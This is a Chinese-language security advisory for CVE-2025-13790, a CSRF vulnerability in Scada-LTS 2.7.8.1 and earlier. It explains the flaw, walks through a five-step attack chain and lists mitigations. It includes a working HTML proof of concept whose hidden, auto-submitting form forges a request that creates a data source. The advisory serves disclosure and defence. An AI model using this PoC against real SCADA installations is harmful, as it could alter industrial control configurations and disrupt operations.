IPBUF安全漏洞报告
English
CVE-2025-13790 CVSS 4.3 中危

Scada-LTS CVE-2025-13790 跨站请求伪造漏洞

披露日期: 2025-11-30

漏洞信息

漏洞编号
CVE-2025-13790
漏洞类型
CSRF
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Scada-LTS

相关标签

CSRF跨站请求伪造Scada-LTSSCADA工业控制系统Web安全CVE-2025-13790

漏洞概述

CVE-2025-13790是Scada-LTS软件中的一个跨站请求伪造(CSRF)漏洞。该漏洞存在于Scada-LTS的2.7.8.1及之前版本中,攻击者可以通过构造恶意的Web页面或链接,诱使已登录的用户在不知情的情况下向Scada-LTS服务器发送恶意请求。由于Scada-LTS在处理某些关键功能时未充分验证请求的来源合法性,攻击者可以利用此漏洞执行未授权的操作,包括修改系统配置、数据操作等。该漏洞的CVSS评分为4.3,属于中等严重程度,攻击复杂度较低,但需要用户交互才能成功利用。漏洞已被公开披露,厂商在收到通知后未做出回应。

技术细节

Scada-LTS是一款开源的SCADA(数据采集与监控系统)系统,广泛应用于工业控制领域。该系统提供Web管理界面,用于配置和监控工业设备。

CVE-2025-13790漏洞根源在于Scada-LTS的Web应用程序缺少对关键操作的CSRF令牌验证机制。当已认证用户在浏览器中访问攻击者精心构造的恶意页面时,页面中的自动提交表单或JavaScript代码会携带用户的有效会话Cookie向Scada-LTS服务器发送请求。由于浏览器会自动携带同源Cookie,服务器无法区分这是用户主动发起的合法请求还是被诱导的恶意请求。

攻击者通常会在恶意页面中嵌入针对Scada-LTS特定功能的请求,如修改数据源配置、添加新用户、变更报警设置等。由于SCADA系统通常控制着关键基础设施,这种CSRF漏洞可能导致生产中断或安全事件。

攻击链分析

STEP 1
步骤1: 信息收集
攻击者识别目标Scada-LTS版本,确认版本 <= 2.7.8.1,并分析系统功能接口
STEP 2
步骤2: 构造恶意页面
攻击者创建包含自动提交表单的HTML页面,表单内容针对Scada-LTS的关键API端点
STEP 3
步骤3: 诱骗用户访问
通过钓鱼邮件、恶意链接、社交工程等方式诱使已登录Scada-LTS的用户访问恶意页面
STEP 4
步骤4: 自动发送恶意请求
用户浏览器加载恶意页面后,自动携带有效Cookie向Scada-LTS服务器发送构造的请求
STEP 5
步骤5: 执行未授权操作
Scada-LTS服务器收到请求后,由于缺少CSRF验证,执行攻击者预设的操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-13790 CSRF PoC for Scada-LTS --> <html> <head> <title>CSRF PoC - Scada-LTS</title> </head> <body> <h1>Scada-LTS CSRF Vulnerability PoC</h1> <p>This PoC demonstrates the CSRF vulnerability in Scada-LTS <= 2.7.8.1</p> <form id="csrfForm" action="http://target:8080/ScadaLTS/api/v1/dataSource" method="POST" style="display:none;"> <!-- Example: Modify data source configuration --> <input type="hidden" name="name" value="Malicious DataSource" /> <input type="hidden" name="enabled" value="true" /> <input type="hidden" name="dataSourceTypeId" value="1" /> <input type="hidden" name="purgeType" value="DO_NOT_PURGE" /> </form> <script> // Auto-submit form when page loads document.addEventListener('DOMContentLoaded', function() { console.log('CSRF PoC: Submitting forged request...'); document.getElementById('csrfForm').submit(); }); </script> <p>If you see this message, the form has been submitted.</p> <p>Check the Scada-LTS server logs for the forged request.</p> </body> </html>

影响范围

Scada-LTS <= 2.7.8.1

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时缓解措施:1)启用Web应用防火墙并配置CSRF防护规则;2)对Scada-LTS的管理接口实施IP白名单访问控制;3)定期检查系统日志,关注异常的API调用行为;4)对管理员进行安全意识培训,提醒不要点击未知链接;5)考虑使用浏览器安全插件提供额外的CSRF保护。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表